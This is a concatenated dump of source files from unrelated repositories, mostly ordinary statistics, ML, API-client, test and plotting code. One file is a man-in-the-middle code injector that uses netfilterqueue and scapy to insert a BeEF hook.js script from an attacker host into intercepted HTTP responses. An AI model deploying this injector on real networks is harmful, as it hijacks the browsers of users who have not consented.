to_cat.append(left)
if y_right is not None:
cens = True
right = (np.dot(x_right, b) - y_right)
to_cat.append(right)
if cens:
concat_stats = np.concatenate(to_cat, axis=0) / s
log_cum_norm = scipy.stats.norm.logcdf(concat_stats) # log_ndtr(concat_stats)
cens_sum = log_cum_norm.sum()
else:
cens_sum = 0
if y_mid is not None:
mid_stats = (y_mid - np.dot(x_mid, b)) / s
mid = scipy.stats.norm.logpdf(mid_stats) - math.log(max(np.finfo('float').resolution, s))
mid_sum = mid.sum()
else:
mid_sum = 0
loglik = cens_sum + mid_sum
return - loglik
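# For reference (added comment): with left-censoring points L_i and
# right-censoring points U_i, the log-likelihood assembled above is
#   sum_{uncensored} [log phi((y_i - x_i b)/s) - log s]
#   + sum_{left}     log Phi((L_i - x_i b)/s)
#   + sum_{right}    log Phi((x_i b - U_i)/s)
# where phi/Phi are the standard normal pdf/cdf; the function returns the
# negative of this for use with scipy.optimize.minimize.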
def tobit_neg_log_likelihood_der(xs, ys, params):
x_left, x_mid, x_right = xs
y_left, y_mid, y_right = ys
b = params[:-1]
# s = math.exp(params[-1]) # in censReg, not using chain rule as below; they optimize in terms of log(s)
s = params[-1]
beta_jac = np.zeros(len(b))
sigma_jac = 0
if y_left is not None:
left_stats = (y_left - np.dot(x_left, b)) / s
l_pdf = scipy.stats.norm.logpdf(left_stats)
l_cdf = log_ndtr(left_stats)
left_frac = np.exp(l_pdf - l_cdf)
beta_left = np.dot(left_frac, x_left / s)
beta_jac -= beta_left
left_sigma = np.dot(left_frac, left_stats)
sigma_jac -= left_sigma
if y_right is not None:
right_stats = (np.dot(x_right, b) - y_right) / s
r_pdf = scipy.stats.norm.logpdf(right_stats)
r_cdf = log_ndtr(right_stats)
right_frac = np.exp(r_pdf - r_cdf)
beta_right = np.dot(right_frac, x_right / s)
beta_jac += beta_right
right_sigma = np.dot(right_frac, right_stats)
sigma_jac -= right_sigma
if y_mid is not None:
mid_stats = (y_mid - np.dot(x_mid, b)) / s
beta_mid = np.dot(mid_stats, x_mid / s)
beta_jac += beta_mid
mid_sigma = (np.square(mid_stats) - 1).sum()
sigma_jac += mid_sigma
combo_jac = np.append(beta_jac, sigma_jac / s) # by chain rule, since the expression above is dloglik/dlogsigma
return -combo_jac
class TobitModel:
def __init__(self, fit_intercept=True):
self.fit_intercept = fit_intercept
self.ols_coef_ = None
self.ols_intercept = None
self.coef_ = None
self.intercept_ = None
self.sigma_ = None
def fit(self, x, y, cens, verbose=False):
"""
Fit a maximum-likelihood Tobit regression
:param x: Pandas DataFrame (n_samples, n_features): Data
:param y: Pandas Series (n_samples,): Target
:param cens: Pandas Series (n_samples,): -1 indicates left-censored samples, 0 for uncensored, 1 for right-censored
:param verbose: boolean, show info from minimization
:return:
"""
x_copy = x.copy()
if self.fit_intercept:
x_copy.insert(0, 'intercept', 1.0)
else:
            x_copy = x_copy - x_copy.mean()  # center columns; DataFrame has no .scale() method
init_reg = LinearRegression(fit_intercept=False).fit(x_copy, y)
b0 = init_reg.coef_
y_pred = init_reg.predict(x_copy)
resid = y - y_pred
resid_var = np.var(resid)
s0 = np.sqrt(resid_var)
params0 = np.append(b0, s0)
xs, ys = split_left_right_censored(x_copy, y, cens)
result = minimize(lambda params: tobit_neg_log_likelihood(xs, ys, params), params0, method='BFGS',
jac=lambda params: tobit_neg_log_likelihood_der(xs, ys, params), options={'disp': verbose})
if verbose:
print(result)
self.ols_coef_ = b0[1:]
self.ols_intercept = b0[0]
if self.fit_intercept:
            self.intercept_ = result.x[0]  # the intercept column was inserted at position 0
self.coef_ = result.x[1:-1]
else:
self.coef_ = result.x[:-1]
self.intercept_ = 0
self.sigma_ = result.x[-1]
return self
def predict(self, x):
return self.intercept_ + np.dot(x, self.coef_)
def score(self, x, y, scoring_function=mean_absolute_error):
        y_pred = self.predict(x)  # include the fitted intercept
return scoring_function(y, y_pred)
# EDIT - insert marginal effects function
def margins(self, x, k = 0):
"""
Marginal effects on dependent variable of a regressor, identified by coef
:param x: array with all regressors (independent variables) to make a prediction
:param k: coefficient corresponding to the regressor with respect to which we want to take the marginal effects
:return: an array with the marginal effects estimated at each observation's level
The marginal effect of regressor k on individual i's y is defined as the product of coef[k] and the normal cdf
evaluated at x_i * coeff[k] / sigma
"""
        return self.coef_[k] * norm.cdf(self.predict(x) / self.sigma_)
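# Example (illustrative sketch, not part of the original module): fitting the
# model on synthetic left-censored data. Column names and the censoring
# threshold are arbitrary choices made here for demonstration.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    x = pd.DataFrame({'x1': rng.normal(size=200)})
    y_latent = 1.0 + 2.0 * x['x1'] + rng.normal(scale=0.5, size=200)
    y = y_latent.clip(lower=0)                        # observations censored at 0
    cens = pd.Series(np.where(y_latent <= 0, -1, 0))  # -1 = left-censored, 0 = uncensored
    model = TobitModel().fit(x, y, cens)
    print(model.intercept_, model.coef_, model.sigma_)
    print(model.margins(x)[:5])                       # marginal effects of x1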
setup.py | Raymond38324/hagworm | 0 | 10371
# -*- coding: utf-8 -*-
import setuptools
with open(r'README.md', r'r', encoding="utf8") as stream:
long_description = stream.read()
setuptools.setup(
name=r'hagworm',
version=r'3.0.0',
license=r'Apache License Version 2.0',
platforms=[r'all'],
author=r'Shaobo.Wang',
author_email=r'<EMAIL>',
description=r'Network Development Suite',
long_description=long_description,
long_description_content_type=r'text/markdown',
url=r'https://github.com/wsb310/hagworm',
packages=setuptools.find_packages(),
package_data={r'hagworm': [r'static/*.*']},
python_requires=r'>= 3.7',
install_requires=[
r'aioftp==0.13.0',
r'aiohttp==3.5.4',
r'aiokafka==0.5.2',
r'aiomysql==0.0.20',
r'aioredis==1.2.0',
r'cacheout==0.11.1',
r'crontab==0.22.6',
r'cryptography==2.7.0',
r'hiredis==1.0.0',
r'Jinja2==2.10.1',
r'tornado-jinja2==0.2.4',
r'loguru==0.3.0',
r'motor==2.0.0',
r'mq_http_sdk==1.0.1',
r'objgraph==3.4.1',
r'Pillow==6.1.0',
r'psutil==5.6.3',
r'PyJWT==1.7.1',
r'pytest==5.0.1',
r'pytest-asyncio==0.10.0',
r'Sphinx==2.1.2',
r'SQLAlchemy==1.3.5',
r'tornado==6.0.3',
r'xlwt==1.3.0',
r'xmltodict==0.12.0',
],
classifiers=[
r'Programming Language :: Python :: 3.7',
r'License :: OSI Approved :: Apache Software License',
r'Operating System :: POSIX :: Linux',
],
)
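# Note (added for context): with this setup.py, a standard setuptools build is
# the usual entry point, e.g. "python setup.py sdist bdist_wheel" followed by
# "pip install dist/hagworm-3.0.0-*.whl"; pip resolves and installs the pinned
# install_requires entries above automatically.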
mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | 0 | 10372 | """
Simple IoC containers that provide direct access to various Keras providers
"""
class ModelSavers:
from mercury_ml.keras.providers import model_saving
save_hdf5 = model_saving.save_keras_hdf5
save_tensorflow_graph = model_saving.save_tensorflow_graph
save_tensorrt_pbtxt_config = model_saving.save_tensorrt_pbtxt_config
save_tensorrt_json_config = model_saving.save_tensorrt_json_config
save_labels_txt = model_saving.save_labels_txt
save_tensorflow_serving_predict_signature_def = model_saving.save_tensorflow_serving_predict_signature_def
class ModelLoaders:
from mercury_ml.keras.providers import model_loading
load_hdf5 = model_loading.load_hdf5_model
class LossFunctionFetchers:
from mercury_ml.keras.providers import loss_function_fetching
get_keras_loss = loss_function_fetching.get_keras_loss
get_custom_loss = loss_function_fetching.get_custom_loss
class OptimizerFetchers:
from mercury_ml.keras.providers import optimizer_fetching
get_keras_optimizer = optimizer_fetching.get_keras_optimizer
class ModelCompilers:
from mercury_ml.keras.providers import model_compilation
compile_model = model_compilation.compile_model
class ModelFitters:
from mercury_ml.keras.providers import model_fitting
fit = model_fitting.fit
fit_generator = model_fitting.fit_generator
class ModelDefinitions:
from mercury_ml.keras.providers.model_definition import conv_simple, mlp_simple
# these are just two small example model definitions. Users should define their own models
# to use as follows:
# >>> ModelDefinitions.my_model = my_model_module.define_model
define_conv_simple = conv_simple.define_model
define_mlp_simple = mlp_simple.define_model
class GeneratorPreprocessingFunctionGetters:
from mercury_ml.keras.providers.generator_preprocessors import get_random_eraser
get_random_eraser = get_random_eraser
class CallBacks:
from mercury_ml.keras.providers.model_callbacks import TensorBoardProvider, \
BaseLoggerProvider, EarlyStoppingProvider, ModelCheckpointProvider, TerminateOnNaNProvider, \
ProgbarLoggerProvider, RemoteMonitorProvider, LearningRateSchedulerProvider, ReduceLROnPlateauProvider, \
CSVLoggerProvider
tensorboard = TensorBoardProvider
base_logger = BaseLoggerProvider
terminate_on_nan = TerminateOnNaNProvider
progbar_logger = ProgbarLoggerProvider
model_checkpoint = ModelCheckpointProvider
early_stopping = EarlyStoppingProvider
remote_monitor = RemoteMonitorProvider
learning_rate_scheduler = LearningRateSchedulerProvider
reduce_lr_on_plateau = ReduceLROnPlateauProvider
csv_logger = CSVLoggerProvider
class ModelEvaluators:
from mercury_ml.keras.providers import model_evaluation
evaluate = model_evaluation.evaluate
evaluate_generator = model_evaluation.evaluate_generator
class PredictionFunctions:
from mercury_ml.keras.providers import prediction
predict = prediction.predict
    predict_generator = prediction.predict_generator
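# Example (illustrative sketch, not part of the original module): registering a
# custom model definition and resolving providers through the containers, as
# suggested in the comment inside ModelDefinitions. The define_my_model
# function below is hypothetical.
#
# def define_my_model(input_size, nb_classes, dropout_rate=0.2):
#     ...  # build and return a Keras model
#
# ModelDefinitions.define_my_model = define_my_model
#
# define = ModelDefinitions.define_my_model
# fit = ModelFitters.fit
# save = ModelSavers.save_hdf5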
Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 0 | 10373 | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re

# Choose the port to intercept: 80 for plain HTTP, 10000 when traffic is
# redirected through sslstrip.
PORT = 80
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packet
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will use on line 23 and 28 and uncomment them."""
    scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
#try:
#.decode() in load
load = scapy_packet[scapy.Raw].load
        if scapy_packet[scapy.TCP].dport == PORT:
print("HTTPS Request")
# print(scapy_packet.show())
load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
        elif scapy_packet[scapy.TCP].sport == PORT:
print("HTTPS Response")
#print(scapy_packet.show())
injection_code = '<script src="http://10.0.2.15:3000/hook.js"></script>'
load = load.replace("</body>", injection_code + "</body>")
content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length))
if load != scapy_packet[scapy.Raw].load:
new_packet = set_load(scapy_packet, load)
packet.set_payload(str(new_packet))
#except UnicodeDecodeError:
# pass
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
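# Note (added for context): NetfilterQueue only sees packets that iptables has
# diverted into queue 0. A typical setup before running this script (as root):
#   iptables -I FORWARD -j NFQUEUE --queue-num 0   # traffic forwarded during MITM
#   iptables -I OUTPUT  -j NFQUEUE --queue-num 0   # when testing on this machine
#   iptables -I INPUT   -j NFQUEUE --queue-num 0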
pycardcast/net/aiohttp.py | Elizafox/pycardcast | 0 | 10374 | # Copyright © 2015 <NAME>.
# All rights reserved.
# This file is part of the pycardcast project. See LICENSE in the root
# directory for licensing information.
import asyncio
import aiohttp
from pycardcast.net import CardcastAPIBase
from pycardcast.deck import (Deck, DeckInfo, DeckInfoNotFoundError,
                             DeckInfoRetrievalError)  # Deck: referenced in deck() below
from pycardcast.card import (BlackCard, WhiteCard, CardNotFoundError,
CardRetrievalError)
from pycardcast.search import (SearchReturn, SearchNotFoundError,
SearchRetrievalError)
class CardcastAPI(CardcastAPIBase):
"""A :py:class:`~pycardcast.net.CardcastAPIBase` implementation using the
aiohttp library.
All the methods here are coroutines except for one:
:py:meth:`~pycardcast.net.aiohttp.CardcastAPI.search_iter`.
"""
@asyncio.coroutine
def deck_info(self, code):
        req = yield from aiohttp.request("get", self.deck_info_url.format(
            code=code))
        if req.status == 200:
            json = yield from req.json()
            return DeckInfo.from_json(json)
        elif req.status == 404:
            err = "Deck not found: {}".format(code)
            raise DeckInfoNotFoundError(err)
        else:
            err = "Error retrieving deck: {} (code {})".format(code,
                                                               req.status)
            raise DeckInfoRetrievalError(err)
@asyncio.coroutine
def white_cards(self, code):
        req = yield from aiohttp.request("get", self.card_list_url.format(
            code=code))
        if req.status == 200:
            json = yield from req.json()
            return WhiteCard.from_json(json)
        elif req.status == 404:
            err = "White cards not found: {}".format(code)
            raise CardNotFoundError(err)
        else:
            err = "Error retrieving white cards: {} (code {})".format(
                code, req.status)
            raise CardRetrievalError(err)
@asyncio.coroutine
def black_cards(self, code):
        req = yield from aiohttp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return BlackCard.from_json(json)
elif req.status == 404:
err = "Black cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving black cards: {} (code {})".format(
code, req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def cards(self, code):
        req = yield from aiohttp.request("get", self.card_list_url.format(
code=code))
if req.status == 200:
json = yield from req.json()
return (BlackCard.from_json(json), WhiteCard.from_json(json))
elif req.status == 404:
err = "Cards not found: {}".format(code)
raise CardNotFoundError(err)
else:
err = "Error retrieving cards: {} (code {})".format(code,
req.status)
raise CardRetrievalError(err)
@asyncio.coroutine
def deck(self, code):
deckinfo = yield from self.deck_info(code)
cards = yield from self.cards(code)
return Deck(deckinfo, cards[0], cards[1])
@asyncio.coroutine
def search(self, name=None, author=None, category=None, offset=0,
limit=None):
qs = {
"search": name,
"author": author,
"category": category,
"offset": offset,
"limit": (deck_list_max if limit is None else limit)
}
        req = yield from aiohttp.request("get", self.deck_list_url, params=qs)
if req.status == 200:
json = yield from req.json()
return SearchReturn.from_json(json)
elif req.status == 404:
err = "Search query returned not found"
raise SearchNotFoundError(err)
else:
err = "Error searching decks (code {})".format(req.status)
raise SearchRetrievalError(err)
    def search_iter(self, name=None, author=None, category=None, offset=0,
                    limit=None):
        # asyncio has no module-level run_until_complete; drive the coroutine
        # through the event loop instead.
        loop = asyncio.get_event_loop()
        s = loop.run_until_complete(self.search(name, author, category,
                                                offset, limit))
        while s.count > 0:
            yield s
            offset += s.count
            s = loop.run_until_complete(self.search(name, author, category,
                                                    offset, limit))
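# Example (illustrative sketch, not part of the original module; the deck code
# "ABCDE" is made up):
#
# import asyncio
#
# api = CardcastAPI()
# loop = asyncio.get_event_loop()
# info = loop.run_until_complete(api.deck_info("ABCDE"))
# black, white = loop.run_until_complete(api.cards("ABCDE"))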
libtiepie/triggeroutput.py | TiePie/python-libtiepie | 6 | 10375
from ctypes import *
from .api import api
from .const import *
from .library import library
class TriggerOutput(object):
""""""
def __init__(self, handle, index):
self._handle = handle
self._index = index
def _get_enabled(self):
""" Check whether a trigger output is enabled. """
value = api.DevTrOutGetEnabled(self._handle, self._index)
library.check_last_status_raise_on_error()
return value != BOOL8_FALSE
def _set_enabled(self, value):
value = BOOL8_TRUE if value else BOOL8_FALSE
api.DevTrOutSetEnabled(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_events(self):
""" Supported trigger output events. """
value = api.DevTrOutGetEvents(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_event(self):
""" Currently selected trigger output event. """
value = api.DevTrOutGetEvent(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _set_event(self, value):
api.DevTrOutSetEvent(self._handle, self._index, value)
library.check_last_status_raise_on_error()
def _get_id(self):
""" Id. """
value = api.DevTrOutGetId(self._handle, self._index)
library.check_last_status_raise_on_error()
return value
def _get_name(self):
""" Name. """
length = api.DevTrOutGetName(self._handle, self._index, None, 0)
library.check_last_status_raise_on_error()
buf = create_string_buffer(length + 1)
api.DevTrOutGetName(self._handle, self._index, buf, length)
library.check_last_status_raise_on_error()
return buf.value.decode('utf-8')
def trigger(self):
""" Trigger the specified device trigger output.
:returns: ``True`` if successful, ``False`` otherwise.
.. versionadded:: 0.6
"""
result = api.DevTrOutTrigger(self._handle, self._index)
library.check_last_status_raise_on_error()
return result != BOOL8_FALSE
enabled = property(_get_enabled, _set_enabled)
events = property(_get_events)
event = property(_get_event, _set_event)
id = property(_get_id)
    name = property(_get_name)
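# Example (illustrative sketch, not part of the original module): reading and
# firing a trigger output. Obtaining a valid device handle depends on the
# surrounding libtiepie setup and is elided here.
#
# out = TriggerOutput(handle, 0)   # first trigger output of an opened device
# if out.enabled:
#     print(out.name, out.id)
#     out.trigger()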
conduit_rest/radish/conduit_rest_steps.py | dduleba/tw2019-ui-tests | 1 | 10376 | import time
from faker import Faker
from radish_ext.radish.step_config import StepConfig
from conduit.client import ConduitClient, ConduitConfig
class ConduitStepsConfig(StepConfig):
def __init__(self, context):
super().__init__(context)
self._faker = None
self.client = ConduitClient(ConduitConfig().set_properties(context.cfg.get('conduit_backend').get('url')))
@property
def faker(self):
if self._faker is None:
self._faker = Faker(locale='en-us')
seed = time.time()
self.log.debug(f'Faker seed {seed}')
self._faker.seed()
return self._faker
def get_conduit_config(context):
return ConduitStepsConfig.get_instance(context)
class ConduitRestBaseSteps(object):
def created_user(self, step, ):
"""created User"""
stc_rest = get_conduit_config(step.context)
user_model = {'user': {'username': stc_rest.faker.user_name(),
'password': <PASSWORD>(),
'email': stc_rest.faker.email()
}
}
stc_rest.test_data.data.update(user_model)
stc_rest.log.debug(user_model)
ret_json = stc_rest.client.users.register_user(**user_model['user'])
stc_rest.log.info(f'user created {ret_json}')
| import time
from faker import Faker
from radish_ext.radish.step_config import StepConfig
from conduit.client import ConduitClient, ConduitConfig
class ConduitStepsConfig(StepConfig):
def __init__(self, context):
super().__init__(context)
self._faker = None
self.client = ConduitClient(ConduitConfig().set_properties(context.cfg.get('conduit_backend').get('url')))
@property
def faker(self):
if self._faker is None:
self._faker = Faker(locale='en-us')
seed = time.time()
self.log.debug(f'Faker seed {seed}')
self._faker.seed()
return self._faker
def get_conduit_config(context):
return ConduitStepsConfig.get_instance(context)
class ConduitRestBaseSteps(object):
def created_user(self, step, ):
"""created User"""
stc_rest = get_conduit_config(step.context)
user_model = {'user': {'username': stc_rest.faker.user_name(),
'password': <PASSWORD>(),
'email': stc_rest.faker.email()
}
}
stc_rest.test_data.data.update(user_model)
stc_rest.log.debug(user_model)
ret_json = stc_rest.client.users.register_user(**user_model['user'])
stc_rest.log.info(f'user created {ret_json}')
| en | 0.981775 | created User | 2.264311 | 2 |
SummaryExternalClient.py | Hackillinois2k18/Main-Repo | 5 | 10377 | <filename>SummaryExternalClient.py<gh_stars>1-10
import requests
import credentials
class SummaryExternalClient:
def pullSummaryForUrl(self, artUrl, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"url" : artUrl,
"title" : title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
except:
sentences = []
return sentences
def pullSummaryForText(self, text, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"text": text,
"title": title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
except:
sentences = []
return sentences
| <filename>SummaryExternalClient.py<gh_stars>1-10
import requests
import credentials
class SummaryExternalClient:
def pullSummaryForUrl(self, artUrl, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"url" : artUrl,
"title" : title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
except:
sentences = []
return sentences
def pullSummaryForText(self, text, title):
url = "https://api.aylien.com/api/v1/summarize"
headers = {"X-AYLIEN-TextAPI-Application-Key": credentials.AYLIEN_APP_KEY,
"X-AYLIEN-TextAPI-Application-ID" : credentials.AYLIEN_APP_ID}
params = {"text": text,
"title": title,
"sentences_number": 7}
summary = requests.get(url=url, headers=headers, params=params)
try:
sentences = summary.json()['sentences']
except:
sentences = []
return sentences
| none | 1 | 3.048499 | 3 |
|
tests/test_render.py | isuruf/conda-build | 0 | 10378 | import os
import sys
from conda_build import api
from conda_build import render
import pytest
def test_output_with_noarch_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch'] = 'python'
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_output_with_noarch_python_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch_python'] = True
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_reduce_duplicate_specs(testing_metadata):
reqs = {'build': ['exact', 'exact 1.2.3 1', 'exact >1.0,<2'],
'host': ['exact', 'exact 1.2.3 1']
}
testing_metadata.meta['requirements'] = reqs
render._simplify_to_exact_constraints(testing_metadata)
assert (testing_metadata.meta['requirements']['build'] ==
testing_metadata.meta['requirements']['host'])
simplified_deps = testing_metadata.meta['requirements']
assert len(simplified_deps['build']) == 1
assert 'exact 1.2.3 1' in simplified_deps['build']
def test_pin_run_as_build_preserve_string(testing_metadata):
m = testing_metadata
m.config.variant['pin_run_as_build']['pkg'] = {
'max_pin': 'x.x'
}
dep = render.get_pin_from_build(
m,
'pkg * somestring*',
{'pkg': '1.2.3 somestring_h1234'}
)
assert dep == 'pkg >=1.2.3,<1.3.0a0 somestring*'
| import os
import sys
from conda_build import api
from conda_build import render
import pytest
def test_output_with_noarch_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch'] = 'python'
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_output_with_noarch_python_says_noarch(testing_metadata):
testing_metadata.meta['build']['noarch_python'] = True
output = api.get_output_file_path(testing_metadata)
assert os.path.sep + "noarch" + os.path.sep in output[0]
def test_reduce_duplicate_specs(testing_metadata):
reqs = {'build': ['exact', 'exact 1.2.3 1', 'exact >1.0,<2'],
'host': ['exact', 'exact 1.2.3 1']
}
testing_metadata.meta['requirements'] = reqs
render._simplify_to_exact_constraints(testing_metadata)
assert (testing_metadata.meta['requirements']['build'] ==
testing_metadata.meta['requirements']['host'])
simplified_deps = testing_metadata.meta['requirements']
assert len(simplified_deps['build']) == 1
assert 'exact 1.2.3 1' in simplified_deps['build']
def test_pin_run_as_build_preserve_string(testing_metadata):
m = testing_metadata
m.config.variant['pin_run_as_build']['pkg'] = {
'max_pin': 'x.x'
}
dep = render.get_pin_from_build(
m,
'pkg * somestring*',
{'pkg': '1.2.3 somestring_h1234'}
)
assert dep == 'pkg >=1.2.3,<1.3.0a0 somestring*'
| none | 1 | 2.063212 | 2 |
|
ABC/007/b.py | fumiyanll23/AtCoder | 0 | 10379 | <reponame>fumiyanll23/AtCoder
def main():
# input
A = input()
# compute
# output
if A == 'a':
print(-1)
else:
print('a')
if __name__ == '__main__':
main()
| def main():
# input
A = input()
# compute
# output
if A == 'a':
print(-1)
else:
print('a')
if __name__ == '__main__':
main() | en | 0.213219 | # input # compute # output | 3.409334 | 3 |
SPAE/read_write.py | simon-schuler/SPAE | 0 | 10380 | #Writing MOOG parameter file for the parameter, abundance, and error calculations.
#The parameter file only needs to be written once, at beginning of the routine, because the output
#files are overwritten with each itereation of the routine, only minimal output data are needed.
#
#The user can choose to have the parameter file written to screen by choosing verbose=True
#The user can choose to have more detailed MOOG output by chooseing the appropriate values for the
#MOOG input parameters.
import numpy as np
def param_file(linelist,atmosphere=0,molecules=1,lines=0,flux=0,damp=0,plot=0,units=0,verbose=False):
if verbose:
print('abfind')
print('terminal \'x11\'')
print('standard_out \'moog_out.1\'')
print('summary_out \'moog_out.2\'')
print('model_in \'star.mod\'')
print('lines_in \'' + linelist + '\'')
print('atmosphere ' + str(atmosphere))
print('molecules ' + str(molecules))
print('lines ' + str(lines))
print('flux/int ' + str(flux))
print('damping ' + str(damp))
print('plot ' + str(plot))
print('units ' + str(units))
with open('batch.par', 'wt') as file:
file.write('abfind' + '\n')
file.write('terminal \'x11\'' + '\n')
file.write('standard_out \'moog_out.1\'' + '\n')
file.write('summary_out \'moog_out.2\'' + '\n')
file.write('model_in \'star.mod\'' + '\n')
file.write('lines_in \'' + linelist + '\'' + '\n')
file.write('atmosphere ' + str(atmosphere) + '\n')
file.write('molecules ' + str(molecules) + '\n')
file.write('lines ' + str(lines) + '\n')
file.write('flux/int ' + str(flux) + '\n')
file.write('damping ' + str(damp) + '\n')
file.write('plot ' + str(plot) + '\n')
file.write('units ' + str(units) + '\n')
#Function for creating the solar and stellar linelists
def linelist_create(star_in, sun_in, direc_path):
with open(direc_path + '/linelist_star.txt', 'w') as out_star:
with open(direc_path + '/linelist_sun.txt', 'w') as out_sun:
with open(star_in) as file_star:
with open(sun_in) as file_sun:
line_star = file_star.readline()
out_star.write(line_star) #accounts for comment line in linelist files
line_sun = file_sun.readline()
out_sun.write(line_sun) #accounts for comment line in linelist files
line = file_star.readlines()
line_s = file_sun.readlines()
for line_star in line:
line_star_split = line_star.split()
#if len(line_star_split) < 2: continue
for line_sun in line_s:
line_sun_split = line_sun.split()
#if len(line_sun_split) < 2: continue
if line_star_split[0] == line_sun_split[0] and line_star_split[1] == line_sun_split[1]:
out_star.write(line_star)
out_sun.write(line_sun)
continue
#Reads Moog output files, parsing elements and colums
def read_file(filename):
count = 0
elements = ['Fe I ', 'Fe II ', 'C I ', 'N I ', 'O I ', 'S I', 'K I ', 'Na I ', 'Mg I ', 'Al I ', 'Si I ', 'Ca I ', 'Sc II ', 'Ti I ', 'Ti II ', 'V ', 'Cr I ',
'Mn I ', 'Co I ', 'Ni I ', 'Cu I ', 'Zn I ', 'Ba II ']
dtype = [('wavelength', 'f8'),
('ID', 'f8'),
('EP', 'f8'),
('logGF', 'f8'),
('EWin', 'f8'),
('logRWin', 'f8'),
('abund', 'f8'),
('delavg', 'f8')]
abundances = []
el_found = []
with open(filename) as file:
while True:
count += 1
# Get next line from file
line = file.readline()
# if line is empty end of file is reached
if not line: break
for j, el in enumerate(elements):
species = 'Abundance Results for Species ' + el
if species in line:
new_arr = []
el_found.append(el)
line = file.readline().split()
line = file.readline().split()
while len(line) == 8:
new_arr.append(line)
line = file.readline().rstrip().split()
new_arr = np.array(new_arr)
new_arr = np.core.records.fromarrays(new_arr.T,dtype=dtype)
abundances.append(new_arr)
return el_found, abundances
lectures/optimization/optimization_plots.py | carolinalvarez/ose-course-scientific-computing | 0 | 10381
"""Plots for optimization lecture."""
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import cm
def plot_contour(f, allvecs, legend_path):
"""Plot contour graph for function f."""
# Create array from values with at least two dimensions.
allvecs = np.atleast_2d(allvecs)
X, Y, Z = _get_grid(f)
CS = plt.contour(X, Y, Z)
plt.clabel(CS, inline=1, fontsize=10)
plt.title("objective function")
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
plt.rc("text", usetex=False)
plt.rc("font", family="serif")
plt.plot(1, 1, "r*", markersize=10, label="minimum")
plt.plot(4.5, -1.5, "bx", markersize=10, label="initial guess")
plt.plot(
np.array(allvecs)[:, 0], np.array(allvecs)[:, 1], "go", markersize=4, label=legend_path,
)
plt.legend()
return plt
def _get_grid(f):
"""Create a grid for function f."""
# create data to visualize objective function
    n = 50  # number of discretization points along the x-axis
    m = 50  # number of discretization points along the y-axis
    a = -2.0
    b = 5.0  # extreme points on the x-axis
    c = -2.0
    d = 5.0  # extreme points on the y-axis
X, Y = np.meshgrid(np.linspace(a, b, n), np.linspace(c, d, m))
Z = np.zeros(X.shape)
argument = np.zeros(2)
for i in range(X.shape[0]):
for j in range(X.shape[1]):
argument[0] = X[i, j]
argument[1] = Y[i, j]
Z[i][j] = f(argument)
return X, Y, Z
def plot_surf(f):
"""Plot surface graph of function f."""
X, Y, Z = _get_grid(f)
fig = plt.figure()
    ax = fig.add_subplot(projection="3d")  # fig.gca(projection=...) was removed in newer Matplotlib
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm)
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
fig.colorbar(surf)
plt.title("objective function")
| """Plots for optimization lecture."""
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import cm
def plot_contour(f, allvecs, legend_path):
"""Plot contour graph for function f."""
# Create array from values with at least two dimensions.
allvecs = np.atleast_2d(allvecs)
X, Y, Z = _get_grid(f)
CS = plt.contour(X, Y, Z)
plt.clabel(CS, inline=1, fontsize=10)
plt.title("objective function")
plt.xlabel("variable $x_1$")
plt.ylabel("variable $x_2$")
plt.rc("text", usetex=False)
plt.rc("font", family="serif")
plt.plot(1, 1, "r*", markersize=10, label="minimum")
plt.plot(4.5, -1.5, "bx", markersize=10, label="initial guess")
plt.plot(
np.array(allvecs)[:, 0], np.array(allvecs)[:, 1], "go", markersize=4, label=legend_path,
)
plt.legend()
return plt
def _get_grid(f):
"""Create a grid for function f."""
# create data to visualize objective function
n = 50 # number of discretization points along the x-axis
m = 50 # number of discretization points along the x-axis
a = -2.0
b = 5.0 # extreme points in the x-axis
c = -2
d = 5.0 # extreme points in the y-axis
